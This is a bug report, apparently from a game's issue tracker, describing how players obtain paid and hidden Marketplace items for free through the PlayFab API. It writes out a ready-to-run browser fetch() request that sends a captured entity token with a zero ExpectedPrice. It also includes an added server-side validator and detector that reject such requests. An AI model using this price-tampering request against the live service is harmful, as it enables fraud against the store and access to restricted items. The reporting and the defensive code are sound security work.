Players can send POST requests to the PlayFab API
I've recently been informed that players have found a way to get items for free by abusing the PlayFab API. They do so by collecting their x-entitytoken via Fiddler, which they use to decrypt their HTTPS traffic.

Once the user has their x-entitytoken, they are able to send a POST request to the PlayFab API that lets them 'purchase' items from the Marketplace, including hidden items such as the Mojang Studios staff cape.
After this they open any website in Chrome (the site itself does not matter), open the developer console and run the following command:

    await fetch('https://20ca2.playfabapi.com/Catalog/PurchaseItemById', {
      method: 'POST',
      headers: {
        'content-type': 'application/json; charset=utf-8',
        'x-entitytoken': 'PASTE ENTITY_TOKEN HERE',
      },
      body: JSON.stringify({
        AutoConsume: false,
        Currencies: [
          {
            CurrencyId: 'ecd19d3c-7635-402c-a185-eb11cb6c6946',
            ExpectedPrice: '0',
          },
        ],
        ItemId: 'cfbb7987-e21a-43a3-8932-07294c2aefd7',
        Quantity: 1,
      }),
    });

After replacing the entity token with your own and filling in the ItemId (if you know it), you can gain the items for free.
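The root cause the report points at is that the client controls `ExpectedPrice` (sent as '0') and the item id, so the store must re-derive the real price and the item's sellability on the server. The following is an added illustration of that server-side check; it is not PlayFab's or Mojang's code. The catalog layout, the `purchasable` flag, the quantity cap and the helper names are assumptions built only from the request body shown above, and the item and currency ids are constructed placeholders.

```javascript
// Added example (not PlayFab's or Mojang's code): a server-side purchase
// validator that never trusts the client-supplied ExpectedPrice.
// Catalog shape, field names and the quantity cap are assumptions.

// Constructed sample catalog, keyed by item id. Prices are per unit in the
// listed currency; `purchasable: false` marks hidden/staff-only items that
// must never be sold through the store regardless of what a client sends.
const CATALOG = {
  'item-coin-pack': {
    purchasable: true,
    prices: { 'currency-coins': 320 },
  },
  'item-staff-cape': {
    purchasable: false, // hidden item
    prices: {},
  },
};

// Validate one purchase request against the authoritative catalog.
// `req` is the parsed JSON body from the client. Returns either the charge
// the server will actually apply or the reason the request is rejected.
function validatePurchase(catalog, req) {
  const item = catalog[req.ItemId];
  if (!item) return { ok: false, reason: 'unknown_item' };
  if (!item.purchasable) return { ok: false, reason: 'item_not_purchasable' };

  // Assumed policy: whole-number quantity between 1 and 100.
  if (!Number.isInteger(req.Quantity) || req.Quantity < 1 || req.Quantity > 100) {
    return { ok: false, reason: 'bad_quantity' };
  }

  if (!Array.isArray(req.Currencies) || req.Currencies.length !== 1) {
    return { ok: false, reason: 'bad_currencies' };
  }
  const { CurrencyId, ExpectedPrice } = req.Currencies[0];
  const unitPrice = item.prices[CurrencyId];
  if (unitPrice === undefined) return { ok: false, reason: 'currency_not_accepted' };

  // The charge comes from the catalog, never from the request. ExpectedPrice
  // is only compared against it so a client that saw a stale price is told
  // to refresh; it is never used as the amount to deduct.
  const charge = unitPrice * req.Quantity;
  const expected = Number(ExpectedPrice);
  if (!Number.isFinite(expected) || expected !== charge) {
    return { ok: false, reason: 'price_mismatch', charge };
  }
  return { ok: true, currencyId: CurrencyId, charge };
}

// Detection helper: true when the client claimed a price below the catalog
// price, which is the pattern described in the report and worth alerting on.
function isUnderpriced(catalog, req) {
  const r = validatePurchase(catalog, req);
  return r.reason === 'price_mismatch' &&
    Number(req.Currencies[0].ExpectedPrice) < r.charge;
}

// Constructed request mirroring the shape from the report: a zero
// ExpectedPrice for an item that normally costs 320.
const ABUSIVE_REQUEST = {
  AutoConsume: false,
  Currencies: [{ CurrencyId: 'currency-coins', ExpectedPrice: '0' }],
  ItemId: 'item-coin-pack',
  Quantity: 1,
};

console.log(validatePurchase(CATALOG, ABUSIVE_REQUEST));
// { ok: false, reason: 'price_mismatch', charge: 320 }
```

Running the block rejects the zero-price request with `price_mismatch` and a server-computed charge of 320, and the same request against the hidden cape is refused before any price is even looked up. The `isUnderpriced` helper is the kind of signal a defender would log and alert on, since legitimate clients only mismatch upward when a price has just changed.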

I tried to recreate this bug and didn't have any success: incoming traffic did not show up in Fiddler and Minecraft completely stopped sending requests, although this seems to be the way most users are getting items they are not meant to have.